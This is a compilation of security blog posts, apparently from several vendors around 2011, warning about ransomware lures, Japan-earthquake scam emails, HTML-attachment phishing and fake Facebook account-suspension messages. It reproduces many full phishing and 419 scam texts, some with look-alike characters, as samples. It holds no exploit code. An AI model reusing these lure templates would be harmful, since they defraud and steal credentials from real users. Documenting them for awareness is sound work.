Computer Security Articles

During our usual malware analysis we found a malware sample which shows a fake warning passing off as official German “Bundeskriminalamt” (the German Federal Police). The page contains various logos taken from the official Internet sites.

It’s easy to discover that this page is obviously not from the official federal police, as the site contains a free mail address from yahoo.com and abounds in numerous grammatical mistakes and typos. The authors of the malware are trying to hassle the victims to pay 100 € via an anonymous pay service called “UKash” to unlock the infected PC. Should the victim fail to pay within 24 hours, the cyber criminals are threatening to delete the whole content of the hard disc.

Right after execution of the malware, the file creates two files inside the temporary directory and executes the files after they are created. The dropped malware files are detected by Avira AntiVir as TR/Dldr.PinchLord.C and TR/Dldr.Harnig.S.210.

After the files have been placed in the system and got executed, they are trying to download further malware components from bal***on.com.

Avira users are protected from the threat with VDF version 7.11.05.134. The main malware is detected as TR/PSW.Papras.A.2.

Heng Chia Ho
Virus Researcher

Here’s a freshly minted scam mail doing the rounds – this time, claiming to be a victim trying to escape Japan and needing a cool $ 1,600 to do it.

From: jamainelecottATyahoo.com
Subject: Please Help Life, From Jamaine Lecott

ADDRESS.NO A14 Tokyo. northeastern coast japan
My Honest Regard,
Jamaine Lecott

Needless to say, you should not get involved in this.

Christopher Boyd

The scammers are in full swing now, aren’t they?

Click to Enlarge

Thanks to Mister U, thenext50k and others for sending over various pieces of spam mail that Twitter users are reporting seeing arrive in their mailboxes.

The example mail above claims to be from “ICRC Basedhelping Foundation” and are unsurprisingly asking for Japan relief donations. They’ve provided bank details so you can send them money from both inside and outside Europe (nice of them), and these unsolicited mails should be dumped into your spam folder as quickly as your fingers will allow.

Christopher Boyd

Thanks to thenext50k for sending this over.

From: “Paul Anderson”
Date: Thu, 17 Mar 2011 20:33:07 +0100
Subject: Urgent response as regards the Japan Earthquake, Tsunami
Private and Confidential

Firstly, I apologize for sending you this sensitive information via e-mail instead of a Certified mail/Post-mail. This is due to the urgency and importance of the information. This project is based on trust, confidentiality and sincerity of purpose in order to have an acceptable meeting of the minds. I am the account manager of Unity Bank Nigeria, West Africa with branches all over the world and almost in all parts of Asia. My name is Paul Anderson and I work both as an auditor and a consultant with the bank.

11 years ago, an expatriate, a Japanese from Tokyo Japan whom was also a client of the bank I work for successfully invested the sum of $ 26.2M USD with the bank I work for. On routine audit check I discovered that this investment account have remained dormant for some years. An investigation regarding the status of the account was carried out. However, during the course of the investigation, it was then revealed that the account holder (Expatriate and Investor) died in the Tsunami Earthquake disaster which took place on March 16, 2011 while on vacation. It was also discovered that the late client died intestate (died without a valid will) as he has no relation that knows about this deposit. Until his sudden demise, He was not married and was 44 years old.

NOW THE CRUX OF THIS E-LETTER is that banking regulation/legislation in Nigeria, demand that I notify the fiscal authorities after a statutory time period when dormant accounts of this type are called in by the monetary regulatory bodies. If no beneficiary to the investment account is presented as the late client’s next of kin within the next 14 official working days so that He or She can be paid the outstanding USD 26.2 Million dollars, the funds/payment will be diverted to the government coffers account as unclaimed bill and it may surprise you to know that funds of this nature are usually embezzled and diverted by corrupt government officials into their pockets to be used for their own selfish gains The above set of facts underscores my reason of writing and making this proposal.

Since we have been unsuccessful in locating any of his relatives, I decided to contact you for a deal so that we can work together as a team to remit the money to your account as my client next of kin since I do not want to sit and watch my client’s hard earned entitlement to go astray, it will be easy for us to achieve because you are of the same name like him. Although I know that a transaction of this magnitude might make anyone apprehensive but I would like to assure you that I am proposing this project to you with the best of intentions.
All I require from you is your honest co-operation to enable us seal this deal through. I guarantee that this transaction will be executed under a Legitimate banking arrangement that will protect you from any breach of law. Upon successful conclusion of this project, you will be compensated with 40% of the total fund, while 60% will be for me.

If you are interested to work with me in this deal of mutual benefit, kindly reply strictly to my personal Email: stating your full names, telephone, fax and mobile numbers for effective communication and oral clarification on how to proceed next, postal address, occupation and position held, scanned photocopy of your identification in the form of international passport or driver’s license or other to enable us prepare all necessary bank papers to effect the quick release of the funds into your nominated bank account.

Sincerely yours,

Paul Anderson.
 
I’m struggling to think if there’s any kind of scam left untouched where the Japan quake / Tsunami is concerned.

Christopher Boyd

In a traditional phishing scam, a phisher usually sets up a website with a fake login form imitating a legitimate online services such as bank, social networking website, auction site or a payment processing service. In an attempt to lure in users, the phisher spams a link to the website through email or instant messaging. Unfortunately for the phishers, modern browsers like Mozilla Firefox and Google Chrome have become quite good at detecting phishing, immediately warning users when a potential phishing site is being opened.

Mozilla Firefox and Google Chrome warning users of a phishing site.

Phishers, however, have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser.  For example, take a look at these spam samples:

Multiple sample of phishing spam campaign with an HTML attachment.

The HTML attachment, stored locally, successfully opens in the browser without the user being warned.

Sample of a phishing HTML form targetting PayPal users. HTML file is saved in the local directory.

When the victims enter their information and click the “Agree and Submit” button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver (in one case, Fritolay.com)

Usually, stolen information are sent to a hack PHP webserver. (note: we notified Fritolay of the offending php file and observe that it has now been removed.)

The phisher’s PHP script then redirects the browser to Paypal’s homepage after successfully submitting stolen information. While the POST request sends information to the phisher’s remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity. Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective. Logically, however, the browser should be able to detect a URL when the browser sends the POST request. So what makes this type of phishing tactic harder to detect from the browser perspective?  Here’s a couple of reasons:

1. Few PHP URLs are reported as abuse.  Average users are not able to report any URL because no phishing URL is visible, unless they are technical enough to view the HTML source code.

2. The URLs are hard to verify as phishing sites.  The URL alone without the accompanying HTML form would be hard to verify as a phish site because the PHP script runs in the server and no visible HTML is displayed after clicking the submit button, other than redirecting the browser elsewhere to the target brand’s homepage.

We have seen an increase in these types of phishing spam campaigns over the last few months. Last month we blogged about a clever phishing campaign targeting Bank of America online users that uses this same phishing tactic. So be wary of HTML attachments included in an email.  If the email seems suspicious, avoid opening the HTML attachment. And if you do happen to open it, be particularly leery of any HTML form requiring you to enter sensitive information.

Our spamtraps are overloaded by a new lottery scam sent as PDF attachment to the spam mails. What initially looked like some kind of exploit for Adobe Reader because of the attached PDF document, proved to be a simple scam. The size of the emails is between 600 and 700 KByte and they all contain the same PDF document. However, we’ve seen various variants of the email text, which usually consists of only a couple of lines. But we’ve seen immediately that it is not just any type of scam, it was a lottery scam written in German and coming from Spain. As can be seen in the subject, it wasn’t completely translated because it contains the word “Won” in a sentence which was intended to be written in German.

The PDF file itself looks interesting and it indeed refers to the same amount of money as has been written in the email. This is not usual in such scams.

Lottery scam written in German we don’t see very often, and never until now a lottery scam as a PDF file. We are not familiar with the telephone numbering system in Spain. It is interesting to see if the telephone number to which the victim should fax the form is a ordinary number or a special service number, possibly with very high rates.

However, the story written in a not really correct language doesn’t convince and we advise our readers to never fall for such stupid scams.

Sorin Mustaca
Data Security Expert

Approximately two hours after an 8.9 earthquake hit northeast Japan we spotted the first potential donation scam site. We’ve seen this before of course, but for a scam site to appear in just two hours–indexed and with content–is pretty damn quick in my experience. Hundreds of domains that could be related to the disaster have been registered so far today; we’re keeping an eye on them.

Please ensure that when you donate to victim relief efforts, that you do so through legitimate sites.

1. .Org domains are cheap. Registering does not authenticate charitable status in any way. Verify that the organization is actually a registered charity.
2. Domain solicitations that arrive by unsolicited email, especially those sounding overly urgent or desperate, are very likely to be scams
3. The same goes for advertising banners
4. If you’d like to help, I recommend you support one of the major international organizations that have a “most in need” fund

The types of scams to expect are fake donation and charity sites (including charity phish), 419 variants, fee based loved-ones locators, tweets pointing to scams and, of course, exploit-laden search-engine optimized sites installing malware.

This post from our cybersecurity mom, Tracy Mooney, charitable giving may also be of use.

Stay safe!

Once again, Brian Krebs sets the bar for data security bloggers. In his latest blog posts he details how Russian online payment processor ChronoPay is linked to various types of online crime.

Especially interesting is their link to the ICPP Copyright Foundation extortion case.

We blogged about this case in April 2010, when this trojan was being distributed widely. It would lock infected computers, showing a list of copyright infringements found from the system. It would not unlock the system unless you used your credit card to pay “fines”.

Emails leaked to Krebs show that ChronoPay was directly involved with the scam. Even the topic of the email shown below is titled “icpp-online.com Fraud Rate”.

Read the full story from Krebs On Security.

On 04/03/11 At 12:26 PM

Facebook users should beware the latest scam doing the rounds on the social network. A so-called opportunity to win free tickets with Southwest Airlines may look like a dream come true, but in fact is an opportunity for scammers to harvest your information.

Naked Security reader Wayne told us that he’d seen the messages being spread from the Facebook account of his daughter and her work colleagues, and further investigation found others users’ accounts being used to spread the scam links.

What’s interesting, as our friends at Facecrooks point out, is that the messages are being spread via comments on other users’ walls rather than as status updates.

Messages include:

sweet! i just got 2 free flight vouchers from Southwest Air to fly to any destination i can think of lmao! i didnt believe it would work but it was, got it here..[LINK] try for yourself i just figured i would share with everyone

hey, i got my free Southwest airfare from [LINK] u should submit for a your own pair while they are still offering them!

hi, i just got my free Southwest airfare from [LINK] you should claim your own pair while its still available!

Southwest is offering complementary flights..but for a short time only: [LINK]

wassup, i just picked up my free Southwest tickets from [LINK] you should request yours while its available!

If you do click on the links you’re taken to a webpage which looks like the genuine Southwest Airlines website, but instead urges you to connect with it via Facebook.

The offer of free tickets may have proven too attractive a lure, of course, and so you might agree to proceed – whereupon you are greeted with the all-too-familiar sight of a Facebook dialog asking for your permission to install a third-party application.

This rogue application can access your profile, and post messages from your account – allowing the scam to spread widely.

You’ll then be presented with a series of questions and offers, which scoop up your personal information. Would you be prepared to give this level of information about yourself to a complete stranger in the street? (Well, perhaps you would as the video we made on the roads of Bristol proved..)

But you shouldn’t be so keen to share your personally identifiable information, especially when you cannot be sure what is going to be done with it.

Will we see more of these air ticket-related scams in the future on Facebook? I would bet money on it. After all, everyone dreams of the idea of flying off somewhere without having to pay for the privilege. In the past, we’ve seen Facebook scams regarding free tickets with JetBlue and Delta Air Lines, so it’s not really a surprise to see the latest scam use a similar ploy.

If you have been hit by scams like this on Facebook, and are struggling to clean-up your profile, here’s a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

You could also do a lot worse than check out our best practices for better privacy and security on Facebook guide.

There’s many attackers out there who want to steal your credential information. And no doubt, Facebook as one of the largest Social Networking sites in the world, always been a target of attack from the bad guys.

Let’s take an example from the following message:

Your facebook account will be closed for security reasons, because disruptive or insulting other facebook users. violates our Terms of Use, which can be blocking your account.

If you believe this is an error, Please follow the link below to verify and fill out the form of as agreement :

hxxp://customer-supports-account.webs.com/facebook-security/

We apologise for any inconvenience caused. If you not confirm, we will disable your account permanently.

We declare that you have read this information.

Thanks,
The Facebook Team

Facebook © 2011. All Rights Reserved.

With social engineering technique, the attacker try to lure users by said that the email come from Facebook Team.

When you click on the given link, it will show the following screen, a similar to the Facebook login page:

This page actually calling another malicious site:

• hxxp://djarum-black.24.eu/

As you can see here, every time you enter the password, then this script will call “incorrect.php”, and show you a messages said that the password you input is wrong. But, in fact, in the background your login information has been recorded by the attacker. And now, they able to change your original password, and they can do anything they want.

And here’s another scam messages that you may receive:

Your facebook account will be closed for security reasons, because disruptive or insulting other facebook users. violates our Terms of Use, which can be blocking your account.

If you believe this is an error, Please follow the link below to verify and fill out the form of as agreement :

http://malicious_links/

We apologise for any inconvenience caused. If you not confirm, we will disable your account permanently.

We declare that you have read this information.

Thanks,
The Facebook Team

Facebook © 2011. All Rights Reserved.

—

You perform actions that may be considered disturbing or offensive.
Your account has been reported by other users.
Your account will be blocked within 1×24 hours.

to cancel the blocking follow this link:

http://malicious_links/

Thank you,
Facebook Team

—

We get reports that your account was made a few mistakes, and is ensured by our team that there were errors in the use of social networking (facebook).
To ensure that this account belongs to you, we need your cooperation.
If you ignore this message and do not follow our policies, we are forced to deactivate or suspend your account.
The deadline for your confirmation for 24 hours starting from this incoming message.

To complete the process, please follow the link below:

http://malicious_links/

Confirmation Code: q0w8i32j

This message is not a scam, if you’re not sure you can change your facebook password and email after registering.

In the future, all warning of security will come through the Facebook Security. To receive future updates to Facebook’s site security, become a fan of the Page.

Copyright © 2010 by the Present Facebook ™
All rights reserved.

—

Your account will be deactivated immediately.Because someone has reported your actions.Maybe you have written content that is abusive. Or upload a picture that can be insulting or harmful to other users.You must confirm your account, to stop the warning deactivated on your account. Please re-confirm your account at:

http://malicious_links/

We provide 1×24 hours to re-confirm your facebook account. If not, we will block your account for the benefit of other users.

If you receive a message like this, please do not click on the given link! This link will lead to a phishing page.

—

Your account has been reported other users on the grounds of violating the provisions facebook:

1. fake profiles
2. porn photo
3. conduct phishing
4. insulting others
5. threatening others
6. inappropriate chat
7. contains pornographic images
8. conduct violation Terms of services (TOS)

facebook does not allow to do actions that are considered disturbing or offensive by other users.
please make confirmation within 24 hours, if you feel there has been a mistake.

IIf you do not confirm, the system automatically shut down your facebook account will be permanently on the assumption that the indications are correct.

Thank you for helping improve our service.

facebook ™ security
© 2010 copy right facebook network inc.

for cancellation, please confirm your facebook account below:

http://malicious_links/

—

Because too many users of this service, we decided to disable some unused accaunt in anticipation of damage to our network.

re-confirm your account here to help our checking account is not used anymore.
click our link below as your statement that accaunt still being used:

===============================

http://malicious_links/

===============================

You must verify your e-mail address before you can use it on facebook service

Attention:
If you do not re-confirm your account immediately, we are not responsible if your account will be disabled automatically by our system.

Thank you for using our services.
Facebook™ Gаmе пеtwогκ іпс
соρугіgһt © 2010 Facebook, іпс.. а׀׀ гіgһtѕ геѕегvеd.

—

Your account has been reported by other users for reasons that are not allowed to facebook.
facebook does not allow to do actions that are considered annoying or insult other users.
please confirm if you feel there have been mistakes, if you have not been confirmed, the system will automatically close your facebook account permanently.
please confirm your facebook account below :

Facebook Securitγ™ | Confirm Account

http://malicious_links/

Cоpγright © Facebook 2010, пеtwоrk Iпc.

—

Your facebook account will be closed for security reasons, because disruptive or insulting other facebook users. violates our Terms of Use, which can be blocking your account.

If you believe this is an error, Please follow the link below to verify and fill out the form of as agreement :

http://malicious_links/

We apologise for any inconvenience caused. If you not confirm, we will disable your account permanently.

We declare that you have read this information.

Thanks,
The Facebook Team

Facebook © 2010. All Rights Reserved.

—

Facebook security systems found indications that you have violated the “Terms of Service ‘(TOS) to do a post that contains :

1.Upload photos or images that violate the conditions of use facebook
2.Copyright infringement
3.Pornography or contains nudity
4.Insults, hateful, threatening, inciting, or acts of violence
5.Perform actions that interfere with another user and you have been reported by other users

Please confirm within 24 hours if you feel there has been a mistake.
If you do not confirm, the system will automatically close your facebook account or permanently disabled with the presumption that such indication is correct.

Please confirm your facebook account by clicking the link below:

http://malicious_links/

Thank you for helping improve our service.

Facebook ™ security
Facebook @2010 copyright network inc

—

Your account has been reported by other users reasons that are not allowed. Subject of:

1. Fake profiles
2. Fake Photo
3. Perform post
4. Insulting others
5. Threatening another person
6. Chat inappropriate
7. Contains pictures porn
8. Violation of Terms Of Service (TOS)

Facebook does not allow to do actions considered to interfere with or insult other users. Please confirmation within 24 hours. If you do not confirm, then the system will automatically deactivate your facebook account permanently with presumption that such indication is correct.

Thank you for helping improve our service.

Facebook™ security
Facebook © 2010 Copyright Network Inc.

If you feel there has been a mistake. Please confirm your facebook account on the PAQ below: WARNING! YOUR ACCOUNT WILL BE DISABLED

—

Our system has received numerous reports from other users about the misuse of your account, and it can cause your account will be suspended or disabled. Sometimes users get this warning because of abusing one of our features.

The reason for this is not limited to:
• Fake profile
• Incompatibility in your profile photo or album
• Those who distribute racist or sexy comments
• mailing systems Abuse Facebook
• Register more than one unique account

If you promise not to do things that violate the terms of service for the second time, our team is still giving direct policy to confirm your account that allows you to use your account again.

For confirm your account, please visit at:

http://malicious_links/

If within 24 hours after you receive information from us you are not immediately confirm the account, your account automatically will be disabled permanently.

Thank you
Regard,
Facebook ™ Security

—

Notice! Your account till now unconfirmed.

Facebook requires users to confirm the account as the respective proof of the authenticity of the account owner.
This is in because many people using false identities in their profile violates our Terms of Use which can be lead to blocking your account temporarily or account permanently closed.

If you are the original owner of this account immediately to confirm your account are at our FAQ

http://malicious_links/

To stop blocking
This or within 24 hours of account
we will switch you.

Thank you for your understanding.
█║▌│█│║▌║││█║▌║▌║
0111 8802 5334 9991 102

Rescue Operations Analyst ** Facebook © 2010 **

—

Suspicious activity detected on your Facebook account (i.e. it looks like you were violating our Terms of Service (“TOS”));
we will being permanently suspended your account.
If you agree to reinstatement terms your account.
Please follow instructions below to request reactivation.

Please contact customer service or
You are required to confirm your account at below :
———————–

http://malicious_links/

———————–

Attention:
If you don’t verify your account, then your account disabled automatically by our system.

Kind Regαrds,
Fасеbооk Sесυгitу .Iпc ™
Cоρугigнт © 2010 Sаfеtу Fасеbооk Lтd.
█║▌│█│║▌║││█║▌│║▌║
apps.facebook.com

—

We get the information from our security system that your account was reported by someone because doing:

► Transferring chiрs thrоugh lоsing and (selling).
► Cheating оr multiрle accоunts.
► Harassment, bullying, оr viоlent threats against оther user.
► Buying оr selling virtual gооds.
► Оffensive, disgusting, оr shоcking acts.

if you feel this is a misunderstanding or false accusation you must confirm your account!

Please confirm your account here:
▬▬▬▬▬▬▬▬▬▬▬

http://malicious_links/

▬▬▬▬▬▬▬▬▬▬▬

Within 24 hours if you do not confirm it, then the game “Texas Holdem Poker” in your account will be subject to sanctions in the form of temporary or permanent suspension, assuming that the allegations were true.

Thank you for improving our services
▬▬▬▬▬▬▬▬▬▬▬

http://malicious_links/

▬▬▬▬▬▬▬▬▬▬▬
Zуnga gamеѕ nеtшоrκ іnс. рaсе роκеr Bооκѕ
Attn: іntеllесtual ρrоρеrtу Agеnt
444 DеHarо ѕt., ѕuіtе 132
ѕan Franсіѕсо, сalіfоrnіa 94107th
█║▌│█│║▌║││█║▌│║▌║

—

Your account has been reported by other users with reasons that are not allowed in facebook, regarding about:

1.Fake profiles.
2.Your use of excessive application.
3.Identity fraud on your account.
4.You write content that is not fun (ROUGH).
5.Using facebook account just for the games applications.

Please confirmation within 24 hours if you feel there has been a mistake. If you do not confirm, the system will automatically close your facebook account or permanently disabled with the presumption that such indication is true.

For cancellation, please confirm your facebook account below:
▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬

http://malicious_links/

▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬
Thank you for helping to improve our services.

Facebook ™ Security
Facebook © 2010 Copyright Network Inc.
█║▌│█│║▌║││█║▌│║▌║

—

Blocking υp Accoυnt, Immediate Verification.
Violation – Facebook Terms of Service Warning! Your account could be disabled…

Blocking υp Accoυnt, Immediate Veгification.
Between You and Facebook Șecurity
Facebook Șecurity December 3 at 5:27pm Report
Violation – Facebook Terms of Service
Warning! Your account could be disabled.

Yoυr behavior indicates that you may be in violation of Facebook’s Terms of Use. Continued misuse of Facebook’s features could result in your account being disabled.

The гeasoпs your facebook account will be disabled:

1. Your account has been reported by some people
2. Fake profiles
3. Identity fraud on your account
4. You write content that is not fun (ROUGH)
5. Using facebook account just foг the games applications.

If you have never done this violation, please verification your account here:
============================

http://malicious_links/

============================

If you do not verification within 24 hoυrs, facebook secυrity system will disable your account. If you do not confirmed, the system will aυtomatically shut your facebook account permanently with the presumption that such indication is true.

Tһank you for helping to improve our services.

Facebook ™ Security
Facebook © 2010 Copyright Network Inc.
█║▌│█│║▌║││█║▌│║▌║

—

Facebook security system found indications that you are in violation Terms Of Services (TOS) to do a post containing:

1.You are violating copyright law No.32 of 2004 facebook about online
2.Upload photograph or image that violates the conditions of use facebook
3.Violation copyright
4.Pornografi or contains nudity
5.Humiliation, hateful, threatening, or inciting violence action
6.Take actions that disrupt or insult other users and you
have been reported by other users.

Please make confirmation within 24 hours if you feel there has been a mistake. if you do not confirm, the system automatically to your facebook account permanently assuming the correct indication

Note: please confirm your facebook account on the following link:

http://malicious_links/

Thank you for helping improve our service.

Facebook ™ security
Facebook © 2010 Copyright network Inc

—

Your account will be deactivated immediately.
Because someone has reported your actions.
Perhaps you have written content that is offensive or upload an image to insult or harm other users.
You must confirm your account, to stop the warning disabled
on your account.
Please confirm address below:
***************************

http://malicious_links/

***************************

“CAUTION”
Please confirm within 1×24 hours to fix your account. If not, our system will automatically close your facebook account permanently with the presumption that such indication is correct.

FACEBOOK ™
соρугіgһt © 2010 Facebook, іпс .. а | | гіgһtѕ геѕегvеd.

—

Your account will be immediately deactivated .someone has reported your actions. Maybe you have written content that is abusive and upload a picture that insulting or harmful to other users. You must confirm your account, to stop deactivation on your account.

Please confirm your account here:

► http://malicious_links/

if within 24 hours you do not confirm , the system will automatically close your facebook account (disabled), with the presumption that such indication is true.

This policy is designed to ensure permanent facebook social networks that are safe, comfortable and reliable for all users.

Thank you for helping to improve our services.
Facebook Team Security 2010
Terms of Intellectual Property and Security Policy

—

You are engaging in behavior that may be considered annoying or abusive by other users. You should be continue this phase for confirmation, if you don’t re-confirm, our system will automatically disabled the account permanently.
Please update your account here :

http://malicious_links/

Thanks for using our services.

—

NOTIFICATIONS!!

Your account will be banned or suspended or otherwise violate the requirements for facebook / poker texas holdem
to avoid suspension or banning of your account, please use the support feature to send an email to our terms of demand for administrators to avoid any actions taken by Zynga. / Facebook team
after you have registered, you can contact our customer service team directly by clicking the link below to confirm your account:

http://malicious_links/

Note: This site is created by Zynga / Facebook Team to give you a chance to confirm your account before your facebook account in the block or in the report.
And Tim Zynga / facebook only provide confirmation of 1×24-hour time limit …!!!
please support us with all the information you need to think to ask about this website.

Facebook Security Team. Inc ™
Copyright © 2010-2011

—

Facebook Security Team have reports there are some mistakes that are not in accordance with the feasibility of using your facebook, among others:
1. Using the application of excessive
2. Identity fraud on your account
3. Using pictures that are considered annoying
4. Insulting other users

To clean all of the allegations about your account, please visit Facebook Security customer support here :

=============================

http://malicious_links/

=============================

Attention !
If you ignore the message of this policy, we are forced to deactivate your account. Thank you for your cooperation

Facebook Security Services ™ 2010

—

Our security system detects suspicious activity on your account that violates the Terms of Service (TOS) in the form of posts that contain pornography, contempt, hatred, threaten, incite, violence, violations of copyrights or contains nudity.

Please confirm your account within 24 hours if you feel there has been a mistake. If you do not confirm, the system will automatically close your facebook account permanently with the presumption that such indication is correct.

Thank you for helping improve our service.

Facеbооk ™ Security
Facеbооk © 2010 Cоpyгіght Nеtwоrk Inc.

Please confirm your facebook account on the following link:
Facebook Account Confirmation

http://malicious_links/

Please confirm your Facebook account immediately to avoid disable account permanently. We apologize for this inconvenience.

—

Our system found recently accessed your account from a location unknown to us. For your protection, please review your last activity to make sure nothing is using up the account without permission.

Reviewing your activity requires only a few moments. We’ll start by asking a few questions to confirm that this is your account. (If we recognize your computer, you will be able to skip this step.).

Please verify your account within 24 hours, if you ignore then we will block this account for your security.

Please verify your account here:
_____________________________________________________

http://malicious_links/

_____________________________________________________

Thanks for Helping to improv our services.

Facebook ™ security
Facebook @2010 copyright network inc.
█ ║ ▌ │ █ │ ║ ▌ ║ │ │ █ ║ ▌ │ ║ ▌ █

—

ΑТТΕΝТІОΝ,youг accouпt will be deactivated iммediately . Because soмeone has reported your actions . Maybe you have written content that is abusiveoг upload a pictuгe that caп be insulting or harмful to other useгs.You must confiгм your account, to stop the waгning deactivated on youг account.Please гe-confiгm your account at:

http://malicious_links/

We provide 1×24 hours to re-confirm your facebook account. If not, we will block your account for the benefit of other users.

Facebook Team. Inc ™
By Copyright © 2010 Facebook, Inc. ..

—

Your account will be disabled.
Your account has been reported by another user with the reason violations,
- Insult other users
- misappropriated
- violate the rules on your account

If you believe this is an error , please click bellow to registration security your account :

http://malicious_links/

If within 12 hours you do not confirm to facebook security center, we will be banned your account.

Thank you, for your cooperation
Best regards, By Facebook Security™.
Сорүгіgһt © 2010 Security Νеtwогk Іпс. Аlŀ гіgһt геѕегνеd

—

Yоur ассоunt һаѕ bееn rероrtеd by аnоtһеr uѕеr wіtһ tһе rеаѕоn:
1. Іllеgаl trаnѕfеr сһір
2. Uѕіng inѕult wоrd tо оtһеr player

Please be sure to visit the Application Facebook Help Center

============================

http://malicious_links/

============================

Thanks,
Facebook Security Team

—

Your account will be deactivated immediately.Because someone has reported your actions.Maybe you have written content that is abusive or upload a picture that can be insulting or harmful to other users.You must confirm your account, to stop the warning deactivated on your account.

Please re-confirm your account at:

http://malicious_links/ <—–click here

We provide 1×24 hours to re-confirm your facebook account. If not, we will block your account for the benefit of other users.

Facebook Team. Inc ™
By Copyright © 2010 Facebook, Inc. ..
All rights reserved
█║▌│█│║▌║││█║▌│║▌

—

Your account has been reported, please list your account to prevent deferred account.
We just want to help you in securing your account.
To secure your account, visit the Facebook service center below:

►http://malicious_links/

If you do not register your account within 24 hours, your account will be suspended or deactivated.
Security of your account will be processed within 24 hours.

Тһаnk yоυ, yоυr fоr соореrаtіоn
Веѕt rеgаrdѕ, Вy Ѕесυrіty ™ Facebook.
Сорyrіgһt ™ © 2010. Аlŀ rіgһt rеѕеrved.

—

Аkυп αпdα теlαһ di lαрoгkαп olеһ репggυпα lαiп dепgαп αlαѕαп үαпg тidαk diрегbolеһkαп di Fαсеbook, Peгiһαl тeптαпg :

1. Pгofil рαlsυ.
2. Foto рαlsυ.
3. mеlαkukαп pоsтiпg.
4. meпgһiпα oгαпg lαiп.
5. mепgαпcαm oгαпg lαiп.
6. Obгolαп yαпg tαk pαпtαs.
7. bегisi gαmbαг теlαпJαпg.
8. mеlαkukαп pеlαпggαгαп тегhαdαp тегms оf sегvicеs (тоs).

Fαсebook тidαk mепgiziпkαп mеlαkυkαп тiпdαkαп Үαпg diαпggαр mепggαпggυ αtαυ mепgһiпα olеһ рeпggυпα lαiп.
Silαhkαп mеlαkukαп kопfiгmαsi dαlαm wαkтu 24 Jαm Jikα αпdα mегαsα теlαh тегJαdi kеkеliгuαп.Jikα αпdα тidαk mепgkопfiгmαsi,sisтеm sеcαгα отоmαтis αkαп mепuтup αkuп fαcеbооk αпdα sеcαгα pегmαпеп dепgαп αпggαpαп bαhwα iпdikαsi тегsеbuт bепαг.

тегimα kαsih kαгепα mеmbαптu mепiпgkαтkαп pеlαyαпαп kαmi.

Uптuk Pembαtαlαп, Silαhkαп kопfiгmαsi αkuп fαcеbооk αпdα di bawah ini:

==============================

http://malicious_links/

==============================

Fαcеbооk ™ sеcuгiтy
Fαcеbооk © 2010 Cоpyгighт петwогk Iпc.

—

your account has been reported by other users for reasons that are not allowed to facebook. facebook does not allow to do actions that are considered annoying or insult other users.
please confirm if you feel there have been mistakes, if you have not been confirmed, the system will automatically close your facebook account permanently.
please confirm your facebook account below :

→ http://malicious_links/

If yоu do пot coпfiгm tһis mistake to us witһiп 24 һοuгs yоuг accоuпt is autоmatically disabled!

Tһапks fог yоuг cоорeгаtiоп.

**Facebook Security Team © 2010**

—

Facebook requires users to register your account, as proof of the authenticity of your account.
This is because many people who use false identities in their profile that violates our Terms of Use.

Please confirm within 24 hours if you suspect that this is our fault. If you do not confirm our system will automatically close your facebook account permanently with the presumption that such indication is correct.

Please confirm your facebook account on the link below:

——————————

http://malicious_links/

——————————

Thank you for helping improve our service.

Team up ™ security
Up @ 2011 copyright inc.

Facebook Security
To provide you with the information you need to protect your information both on and off Facebook.

—

You have been reported for inappropriate images or chat user Content…

The Service may invite you to chat or participate in blogs,
message boards, online forums and other functionality and may
provide you with the opportunity to create, submit, post,
display, transmit, perform, publish, distribute or broadcast
content without limitation, text, writings, photographs,
graphics, comments,Any material you transmit to facebook will
be treated as non-confidential and non-proprietary.

You still have your last chance To prevent your account
from being disabled , please login using the address below:
◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊

http://malicious_links/

◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊
Notice : be sure you submitted the correct email,password and
same date of birth u provided in facebook personal information.
Facebook © 2011
█║▌│█│║▌║││█║▌│║▌║

—

You winner selected α lоtterγ prіze frоm α lоtterγ Zγηgα.
Yоu’ve wоη α $250.000.000 mіllіоη pіeces оf chіps αηd 50 Gоld.
Further іnfоrmαtіоη, clіck оη the URL :

♣♠◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊♣♠

http://malicious_links/

♣♠◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊♣♠

Thіs іs α lіst оf ηіηe оther grαηd prіze wіηηers frоm dіffereηt cіtіes:
1. Dαηіel G. frоm Pіcо Rіverα, Lоs Αηgeles
2. Leηіη M. frоm Cuηdіηαmαrcα, Cоlumbіα
3. Mоdestαs P. frоm Pαηevezγs, Lіthuαηіα
4. Mαrk V. frоm Peηηsγlvαηіα, USΑ
5. Αbі R. frоm Αηkαrα, Turkeγ
6. Shαrоη P. frоm Αlbertα, Cαηαdα
7. Αgηαr J. frоm Mαcerαtα, Іtαlγ
8. Bruce M. frоm Eηglαηd, Uηіted Kіηgdоm
9. Mαuі H. frоm Petrіηjα, Crоαtіα

Thαηk γоu tо pαrtіcіpαted, lооk оut fоr the ηext grαηd prіze!
Dоη’t fоrget tо bооkmαrk Zγηgα Pоker,sо γоu cαη eαsіlγ cоme bαck tо the gαme.

Cоpγrіght © 2011 Zγηgα Gαme Ηetwоrk Іηc.. Αll rіghts reserved.

—

Your account is reported to have violated policies that are considered annoying or insulting Facebook users. Until our security system will deactivate your account within 24 hours if you do not do the reconfirmation.

If you still want to use your account, please confirm your facebook account below:

☞ http://malicious_links/

Facebook Security ™
Copyright Facebook © 2011 Inc
phone:(650.543.4800) fax:(650.543.4801)
▌█ ▐ ║▌█ ▐ ║▌█ ▐ ║▌▌█ ▐ ║▌█ ▐ ║▌█

—

Facebook security system we have found one indication that you violated the “Terms of Service” (TOS) that contain posts forbidden as follows :

1. Fake profiles.
2. Upload photos or images and videos that contain pornography.
3. Send a message or comment on news that contain insults, hateful, threatening, inciting, or acts of violence to other facebook users.
4. Using facebook account just for the games applications.
